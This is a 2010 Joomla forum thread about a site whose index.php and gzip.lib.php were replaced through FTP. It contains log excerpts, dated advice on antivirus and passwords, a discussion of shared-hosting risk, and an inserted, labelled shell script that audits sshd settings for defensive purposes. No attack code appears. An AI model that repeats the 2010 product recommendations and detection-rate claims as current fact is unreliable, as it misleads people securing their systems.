And for Mac (anyone with upload privileges in your Joomla have a Mac ? )
Technically, the Trojan is known as AppleScript-THT, and is classified as a Trojan horse exploit. The virus affects the Apple Remote Desktop Agent software in OS X to compromise the operating system, and gives remote control of the user’s computer to hackers. The virus is transmitted online, and targets only Mac OS X operating systems, while ignoring Windows users completely (a nice change of pace).
http://www.romow.com/computer-blog/rare ... nfect-pcs/

Best guess
A PC/Mac is still infected
and or
One or more of your backup files is corrupt.
creating an infinite loop infecting and reinfecting.

Possibly, if remote access of a PC/Mac has been initiated, then your IP could have been hijacked and the hacker has altered some of the DNS records on your server.

Recommendations
Check all PC's/Mac's that connect to your server, with everything available, until you find the culprit. IT IS THERE !!!

This is more than some script kiddy uploading script, it has all the 'Hallmarks' of remote control with a Trojan.

PhilD
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by PhilD » Tue Nov 09, 2010 1:29 am

"3. I have no clue about front page extensions? What is that?"
FrontPage extensions are a set of server-side scripts and programs which enable users of Microsoft FrontPage to use its special components, called Web Bots, on a Unix-type server. These scripts and programs are not the most secure and should be removed from the domain if you're not using FrontPage or a website that was developed with Microsoft FrontPage.
Usually, there will be an option in the domain's control panel to remove these FrontPage extensions. If not, or you cannot find where to remove the extensions, ask your hosting service tech support to remove FrontPage extensions from your domain(s).

PhilD
Joomla! Hero
Posts: 2734
Joined: Sat Oct 21, 2006 10:20 pm
Location: Wisconsin USA

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by PhilD » Tue Nov 09, 2010 1:33 am

If the same hosting account hosts all your domains, it is possible to get into one and then get into the others from that one. After all, they are just subdirectories of the main account.

your main hosting account directory
                 |
         ________|________
         |       |       |
      domain1 domain2 domain3

RysiuM
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Tue Nov 09, 2010 2:17 am

Here is the update:

I access FTP and cPanel for both sites from only one PC, with Trend Micro. I ran the full check; it came back clean.
Both websites are on shared hosting at mochahost - two independent accounts, but it looks like mochahost put them on the same shared IP.
FrontPage Extensions are not installed (available, but I did not install them).
The backup of the website is clean (I am 100% sure).

What I can suspect are only 3 options:
1. My PC got a trojan not found by Trend Micro and the passwords got stolen
2. Someone was able to break into the mochahost server
3. Someone is able to break into my sites via FTP or HTTP (maybe there is a hole I am not aware of)

What is weird, there was a guy (post http://forum.joomla.org/viewtopic.php?f=432&t=418523) who reported exactly the same kind of attack before, so he must meet the same criteria I did.

richardsec
Joomla! Apprentice
Posts: 13
Joined: Sat Oct 09, 2010 10:31 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by richardsec » Tue Nov 09, 2010 6:59 am

RysiuM wrote:Thank you for the prompt response.
What I suspect is that the "ftp" was from some "tool" not a human action (identical entries in the ftp log) and the changes on my site were identical and limited to these two files (if someone knows my password, I would imagine my sites will be quite different by now).

If this can help to find out what is wrong, here is the full extract from raw log accessing my second site from that IP address:
FTP log:
==========
Mon Oct 25 04:55:05 2010 0 213.5.68.141 11030 ..../templates/template2/index.php a _ o r xxx ftp 1 * c
Mon Oct 25 04:55:06 2010 0 213.5.68.141 11076 ..../templates/template2/index.php a _ i r xxx ftp 1 * c
Mon Oct 25 04:55:07 2010 0 213.5.68.141 11030 ..../templates/template2/index.php a _ i r xxx ftp 1 * c
Mon Oct 25 04:55:08 2010 0 213.5.68.141 29463 ..../administrator/includes/pcl/gzip.lib.php a _ i r xxx ftp 1 * c

...
This indicates that someone has either compromised your PC, stealing FTP passwords, or has guessed your FTP password (known as brute-forcing; there is very good technology available for password cracking, so even 8-character passwords are not enough).

Once a hacker has got your FTP password, it often goes into a long list that's used by a hacker tool that will try many sites at once - that's why both domains were attacked at almost the same time.

Like others in this thread, I strongly suspect an infected PC/Mac. It's essential to scan with several antivirus tools. For PC, I would use free trials or web scans using ALL of the following.

- Kaspersky - use their trial software (antivirus only) - http://www.kaspersky.co.uk/ - or their online scanner, or their free virus removal tool (latter is recommended)
- ESET NOD32 - free trial of NOD32 antivirus - has a free web based scan that's OK for light infections - http://www.eset.co.uk/
- Prevx - free trial - guarantees removal if you pay for their tool - http://www.prevx.com/
- Malwarebytes (free) - very good on removal of viruses the others can't remove - http://www.malwarebytes.org/
- SuperAntispyware (free) - good for spyware removal - http://www.superantispyware.com/
- Sophos Anti-Rootkit (free) - the most stubborn and well-hidden viruses are called 'rootkits' - http://www.sophos.com/products/free-too ... otkit.html
- optional: try ComboFix, GMER, HiJackThis and others as recommended by antivirus forums - more expertise required though

Any single antivirus will only find about 60% of all viruses, and in some cases it will find 'false positives' - legitimate files that it thinks are viruses.

I don't recommend Trend Micro - from reading av-test.de, I would go with one of ESET, Kaspersky, Norton 2010 (much better than old versions), and also run Prevx (free or paid edition) on top - Prevx is very light and runs well with other antiviruses.

Also, on your PC, install Secunia PSI so that you get alerts of out of date applications - the classic way a PC is exploited is by (a) hacker compromising website and uploading malicious JavaScript, then (b) site visitor loads JavaScript which attempts to exploit a number of holes in out of date apps on their PC. (This is also a good reason to secure your website, so you don't infect your visitors.)

For Mac, I would scan with Intego, Sophos (free) and Panda, and make sure you keep up to date with all software updates including third party apps such as Flash and Adobe apps.

I assume you've changed your FTP password, but in addition:
- stop using FTP, start using SFTP - some client PC malware will spy on the TCP traffic on your PC so that it can get the passwords. SFTP is immune to this, and most good webhosts support this.
- set a 12 character random password for FTP and a different one for SFTP

To help in generating and remembering these strong passwords, try using LastPass, which makes it easy to manage all your passwords in one place, or KeePass.

leolam
Joomla! Master
Posts: 20232
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by leolam » Tue Nov 09, 2010 8:31 am

Webdongle wrote:Recommendations
Check all PC's/Mac's that connect to your server, with everything available, until you find the culprit. IT IS THERE !!!

This is more than some script kiddy uploading script, it has all the 'Hallmarks' of remote control with a Trojan.
Cannot agree more. FTP has been compromised and the moment your FTP is loaded the bad script is automatically activated. A couple of things here... Use indeed Prevx/Malwarebytes or Panda. All 3 will definitely discover Gumblar or its variants for sure (we know that by experience). Run multiple scanners simultaneously. We use Prevx 3.x real-time protection and Panda Security Suite 2010/2011 on each and every PC. You will be amazed what is being thrown at your PC through your browsers, for instance.

Passwords: Use very strong passwords. Generate them with at least 14 or better 18 digits (see and digest http://strongpasswordgenerator.com/) and do NOT store them in your FTP client (!)

Use an FTP client that does not store user data (user/pass) in plain text. Make sure you use a professional client that encrypts the passwords, or better, use KeePass (http://keepass.info/)

Use, if enabled by your host, SFTP instead of FTP (uses SSH: http://en.wikipedia.org/wiki/Secure_Shell) but first "clean that PC of yours". As mentioned, the stuff is present and if you cannot find it.... well mate, I have gone through it myself 1 1/2 years ago and I actually took my backups, wiped/formatted my entire PC including my boot sector to make sure that "Gumblar" was gone. I was affected through a client's site while running other security software which actually did not protect me that time (McAfee in those days). These days when we visit a client site we actually use specially designated and protected PCs not inter-connected with our network. Are we over-protective? Cannot be too careful at all!

Hope this helps

Webdongle
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Tue Nov 09, 2010 2:07 pm

RysiuM wrote:...

I access ftp and cpanel to both sites from only one PC with Trend Micro. Run the full check, came clean.
....
If you look at the two posts above this one then you will see that there are now 3 of us that say checking with one anti virus is not enough.

I say again
Webdongle wrote:......
Check all PC's/Mac's that connect to your server, with everything available, until you find the culprit. IT IS THERE !!!
.......

RysiuM
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Wed Nov 10, 2010 1:13 am

Webdongle wrote:If you look at the two posts above this one then you will see that there are now 3 of us that say checking with one anti virus is not enough.
Just finished checking with the fourth tool - still clean. I don't want to get into paranoia :eek: Both sites are still clean (watching them every day).

Webdongle
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Wed Nov 10, 2010 1:24 am

Scanning the IP finds
Report 2010-11-08 13:25:24 (GMT 1)
IP Address 74.55.210.66
IP Hostname gt2.mochahost.com
IP Country US
AS Number 21844
AS Name THEPLANET-AS - ThePlanet.com Internet Service...
Detections 2 / 27 (7 %)
Status SUSPICIOUS

leolam
Joomla! Master
Posts: 20232
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by leolam » Wed Nov 10, 2010 3:34 am

Webdongle wrote:Scanning the IP finds
means what?

leolam
Joomla! Master
Posts: 20232
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by leolam » Wed Nov 10, 2010 5:16 am

1082 domains (!) hosted on the same web server as IP 74.55.210.66... That is what overselling means. Now you can see why Mochahost is cheap... and one should then ask oneself what that means for security.


Webdongle
Joomla! Master
Posts: 39062
Joined: Sat Apr 05, 2008 9:58 pm

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by Webdongle » Wed Nov 10, 2010 1:35 pm

leolam wrote:1082 domains (!) hosted on the same web server as IP 74.55.210.66... ..
Nice spot, I missed that, only noticed his two on that.

mandville
Joomla! Master
Posts: 14970
Joined: Mon Mar 20, 2006 1:56 am
Location: The Girly Side of Joomla in Sussex

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by mandville » Wed Nov 10, 2010 2:46 pm

Checking some of the domains listed shows rampant infections. Wonder if they use jail shell?
HU2HY- Poor questions = Poor answer
Un requested Help PM's will be reported, added to the foe list and possibly just deleted
{VEL Team Leader}{TM Auditor }{ Showcase & Security forums Moderator}

leolam
Joomla! Master
Posts: 20232
Joined: Mon Aug 29, 2005 10:17 am
Location: Netherlands/ UK/ S'pore/Jakarta/ North America
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by leolam » Wed Nov 10, 2010 3:15 pm

mandville wrote:Wonder if they use jail shell ?
They show an intro movie with reseller accounts on how to activate jail-shell or shell. In our opinion, and many hosting companies agree with me, you do not give shell access to end users on a shared or reseller account... not even jail shell (we certainly don't give shell to shared or reseller accounts). The simple reason is that in such a scenario you cannot change the access port (from the default 22, which is the usual port for brute-force attacks on the shell), create a wheel-group user/pass (for that account), set up key-only logins, etc. etc., to name a few related security issues. Besides that, what knowledge does the average (!) user have about the 'nix' command line, so why create security risks? We do offer shell access to certain privileged users and only where we know that the webmaster has a good idea how to handle his shell and, with it, the security issues.

For those who will ask what is jail shell access?
Jailshell provides users a limited privilege to ssh into their own home directory and manage all the files under their cPanel user's ownership. As your account is on a shared server, for security measures, one will never be provided with "bash" (do a Google search for that). Jailshell will read .bashrc and .bash_profile only under your home directory. You can run most of the Linux commands needed to manage your account only and have no access to other accounts in the /home directory. You are not allowed to compile or do any server-wide installations/maintenance/upgrades.

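As an added example that is not part of the thread (nor cPanel's or any host's code), here is a small POSIX shell audit for the sshd settings Leo's post lists as the reason shell access is risky on shared hosting: default port 22, password instead of key-only logins, root login, and no wheel-group restriction. Both sshd_config samples are constructed for the example.

```shell
#!/bin/sh
# Added example (not from the thread): audit an sshd_config for the weak
# settings named in Leo's post: default port 22, password instead of
# key-only logins, root login, no wheel-group restriction. Findings go to
# stderr, the finding count to stdout, so the result can be checked.

# Constructed sample: an unhardened configuration.
WEAK_CFG='# stock settings
Port 22
PasswordAuthentication yes
PermitRootLogin yes'

# Constructed sample: the hardened counterpart.
HARD_CFG='Port 2222
PubkeyAuthentication yes
PasswordAuthentication no
PermitRootLogin no
AllowGroups wheel'

lc() { printf '%s' "$1" | tr '[:upper:]' '[:lower:]'; }

# sshd_get CONFIG KEY: effective value of KEY. sshd honours the first match,
# keywords are case-insensitive, comments and blank lines are ignored.
sshd_get() {
    printf '%s\n' "$1" | awk -v key="$(lc "$2")" '
        /^[[:space:]]*(#|$)/ { next }
        tolower($1) == key { print $2; exit }'
}

# sshd_audit CONFIG: report findings on stderr, print their number on stdout.
sshd_audit() {
    cfg=$1; n=0
    port=$(sshd_get "$cfg" Port)
    if [ -z "$port" ] || [ "$port" = 22 ]; then
        echo "FINDING: sshd on default port 22, the usual brute-force target" >&2; n=$((n+1))
    fi
    if [ "$(lc "$(sshd_get "$cfg" PasswordAuthentication)")" != no ]; then
        echo "FINDING: password logins allowed; set PasswordAuthentication no" >&2; n=$((n+1))
    fi
    if [ "$(lc "$(sshd_get "$cfg" PermitRootLogin)")" != no ]; then
        echo "FINDING: PermitRootLogin not set to no" >&2; n=$((n+1))
    fi
    if [ -z "$(sshd_get "$cfg" AllowGroups)" ] && [ -z "$(sshd_get "$cfg" AllowUsers)" ]; then
        echo "FINDING: no AllowGroups/AllowUsers (e.g. wheel) restriction" >&2; n=$((n+1))
    fi
    echo "$n"
}

echo "weak config: $(sshd_audit "$WEAK_CFG") findings"     # 4
echo "hardened config: $(sshd_audit "$HARD_CFG") findings" # 0
```

On a real host, feed it the live file with `sshd_audit "$(cat /etc/ssh/sshd_config)"`; on a shared account you typically cannot change these values yourself, which is the point Leo makes.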

RysiuM
Joomla! Apprentice
Posts: 42
Joined: Thu Jan 08, 2009 6:22 am
Contact:

Re: Attacked by replacing index.php and inserting gzip.lib.p

Post by RysiuM » Wed Nov 10, 2010 3:40 pm

So.... does it mean that the host got a problem? Should I move out?